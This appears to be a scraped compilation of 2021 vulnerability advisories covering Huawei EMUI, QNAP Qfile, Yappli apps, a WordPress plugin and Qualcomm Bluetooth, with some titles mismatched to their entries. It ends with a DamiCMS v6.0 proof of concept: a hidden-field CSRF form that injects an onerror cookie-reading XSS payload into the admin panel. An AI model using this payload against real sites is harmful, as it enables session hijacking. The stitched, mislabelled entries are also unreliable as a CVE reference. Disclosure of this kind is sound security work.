Affected versions: EMUI 11.0.0, EMUI 10.1.1, EMUI 10.1.0, EMUI 10.0.0, Magic UI 4.0.0, Magic UI 3.1.1, Magic UI 3.1.0, Magic UI 3.0.0

Impact: Successful exploitation of this vulnerability may cause out-of-bounds memory write.

CVE-2021-37120: Double free vulnerability in some HUAWEI devices

Severity: High

Affected versions: EMUI 10.1.1, EMUI 10.1.0, Magic UI 3.1.1, Magic UI 3.1.0

Impact: Successful exploitation of this vulnerability may cause a kernel crash or privilege escalation.

CVE-2021-37121: Configuration defects in some HUAWEI devices

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.0.0, Magic UI 3.1.0, Magic UI 3.0.0

Impact: Successful exploitation of this vulnerability may elevate the MEID (IMEI) permission.

CVE-2021-22319: Improper verification vulnerability in some HUAWEI phones

Severity: Medium

Affected versions: EMUI 11.0.1, EMUI 11.0.0, EMUI 10.1.1, EMUI 10.1.0, Magic UI 4.0.0, Magic UI 3.1.1, Magic UI 3.1.0

Impact: Successful exploitation of this vulnerability may cause integer overflows.

CVE-2021-37111: October

The Site Reviews WordPress plugin before 5.17.3 does not sanitise and escape the site-reviews parameter of the glsr_action AJAX action (available to unauthenticated and any authenticated users), allowing them to perform Cross-Site Scripting attacks against logged in admins viewing the Tool dashboard of the plugin

CVE-2021-24973: Changeset 2629821 – WordPress Plugin Repository

Possible memory corruption in BT controller when it receives an oversized LMP packet over 2-DH1 link and leads to denial of service in BlueCore

CVE-2021-35093: December 2021 Security Bulletin | Qualcomm

An improper authentication vulnerability has been reported to affect Android App Qfile. If exploited, this vulnerability allows attackers to compromise app and access information
We have already fixed this vulnerability in the following versions of Qfile:
Qfile 3.0.0.1105 and later


<< Back to Security Advisory List

*   **Release date:** December 10, 2021
*   **Security ID:** QSA-21-55
*   **Severity:** Medium
*   **CVE identifier:** CVE-2021-38688
*   **Affected products:** Qfile for Android
*   **Status:** Resolved

**Summary**

An improper authentication vulnerability has been reported to affect Android devices running Qfile. If exploited, this vulnerability allows attackers to compromise the app and access private information.

We have already fixed the vulnerability in the following versions of Qfile:

*   Qfile 3.0.0.1105 and later for Android

**Recommendation**

To secure your device, we strongly recommend updating Qfile on your Android device to the latest version to benefit from vulnerability fixes.

**Acknowledgements:** Code Ninja

**Revision History:** V1.0 (December 10, 2021) - Published

CVE-2021-38688: Improper Authentication Vulnerability in Qfile - Security Advisory

Yappli is an application development platform which provides the function to access a requested URL using Custom URL Scheme. When Android apps are developed with Yappli versions since v7.3.6 and prior to v9.30.0, they are vulnerable to improper authorization in Custom URL Scheme handler, and may be directed to unintended sites via a specially crafted URL.

Published:2021/12/22  Last Updated:2021/12/22

**Overview**

Android Apps developed using Yappli fails to restrict custom URL schemes properly.

**Products Affected**

*   Android Apps that are developed in Yappli since v7.3.6 and prior to v9.30.0

**Description**

Yappli provided by Yappli, Inc. is an application development platform.  
Android Apps that are developed with Yappli provide the function to access a requested URL using Custom URL Scheme.  
The access to the function is not restricted properly (CWE-939) which may be exploited to direct the App to connect to unintended sites.

**Impact**

When accessing a malicious website containing a specially crafted URL, the vulnerable app may be directed to connect to some unintended site.  
As a result, the app's internal information may be leaked and/or altered.

**Solution**

**Solution for developers of affected applications**  
Rebuild the application in the latest development environment. Until the rebuilt version is published, remove the affected version from an application store.

**Solution for users of affected applications**  
Please inquire the application developer.

**Vendor Status**

**References**

**JPCERT/CC Addendum**

**Vulnerability Analysis by JPCERT/CC**

CVSS v3 CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Attack Vector(AV)

Physical (P)

Local (L)

Adjacent (A)

Network (N)

Attack Complexity(AC)

High (H)

Low (L)

Privileges Required(PR)

High (H)

Low (L)

None (N)

User Interaction(UI)

Required (R)

None (N)

Scope(S)

Unchanged (U)

Changed (C)

Confidentiality Impact(C)

None (N)

Low (L)

High (H)

Integrity Impact(I)

None (N)

Low (L)

High (H)

Availability Impact(A)

None (N)

Low (L)

High (H)

CVSS v2 AV:N/AC:M/Au:N/C:N/I:P/A:N

Access Vector(AV)

Local (L)

Adjacent Network (A)

Network (N)

Access Complexity(AC)

High (H)

Medium (M)

Low (L)

Authentication(Au)

Multiple (M)

Single (S)

None (N)

Confidentiality Impact(C)

None (N)

Partial (P)

Complete (C)

Integrity Impact(I)

None (N)

Partial (P)

Complete (C)

Availability Impact(A)

None (N)

Partial (P)

Complete (C)

**Comment**

"Integrity(I)" is the primary impact, alteration of the application's access destination,   
whereas "Confidentiality(C)" and "Availability(A)" are the secondary impacts.

**Credit**

RyotaK reported and coordinated with the developer to fix this vulnerability.  
After coordination was completed, this case was reported to IPA, and JPCERT/CC coordinated with the developer for the publication under Information Security Early Warning Partnership.

**Other Information**

CVE-2021-20873: Android Apps developed using Yappli fails to restrict custom URL schemes properly

A vulnerability in /damicms-master/admin.php?s=/Article/doedit of DamiCMS v6.0 allows attackers to compromise and impersonate user accounts via obtaining a user's session cookie.

Permalink

Cannot retrieve contributors at this time

Malicious JavaScript has access to all the same objects as the rest of the web page, including access to cookies and local storage, which are often used to store session tokens. If an attacker can obtain a user's session cookie, they can then impersonate that user.

After the administrator login in,open the poc poc：

      
      <body>
        <form action="http://172.16.100.28/damicms-master/admin.php?s=/Article/doedit" method="POST">
          <input type="hidden" name="title" value="æµ&#139;è&#175;&#149;äº&#167;å&#147;&#129;&lt;img&#32;src&#61;&quot;x&quot;&#32;onerror&#61;alert&#40;document&#46;cookie&#41;&#32;&gt;" />
          <input type="hidden" name="TitleFontColor" value="" />
          <input type="hidden" name="keywords" value="" />
          <input type="hidden" name="description" value="å&#158;&#139;å&#143;&#183;&#58;&#32;ä&#187;&#183;æ&#160;&#188;ï&#188;&#154;é&#157;&#162;è&#174;&#174;&#32;é&#162;&#156;è&#137;&#178;&#58;" />
          <input type="hidden" name="hits" value="69" />
          <input type="hidden" name="typeid" value="24" />
          <input type="hidden" name="imgurl" value="&#47;Public&#47;Uploads&#47;thumb&#47;thumb&#95;1393207060&#46;jpg" />
          <input type="hidden" name="isimg" value="1" />
          <input type="hidden" name="content" value="androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;" />
          <input type="hidden" name="price" value="4000" />
          <input type="hidden" name="color" value="ç&#129;&#176;è&#137;&#178;" />
          <input type="hidden" name="product&#95;xinghao" value="M002457J" />
          <input type="hidden" name="submit" value="ä&#191;&#174;æ&#148;&#185;" />
          <input type="hidden" name="aid" value="66" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
    

damicms-master/admin.php?s=/Index/index Successfully inserted ![](https://github.com/wind-cyber/DamiCMS-v6.0.0-have-csrf-and-xss-Vulnerabilities-/raw/master/x)

![描述](https://github.com/wind-cyber/DamiCMS-v6.0.0-have-csrf-and-xss-Vulnerabilities-/raw/master/rpng/ZS4DTJV2YV%5DB6QRAEP0%25FH8.png)

Tag

#android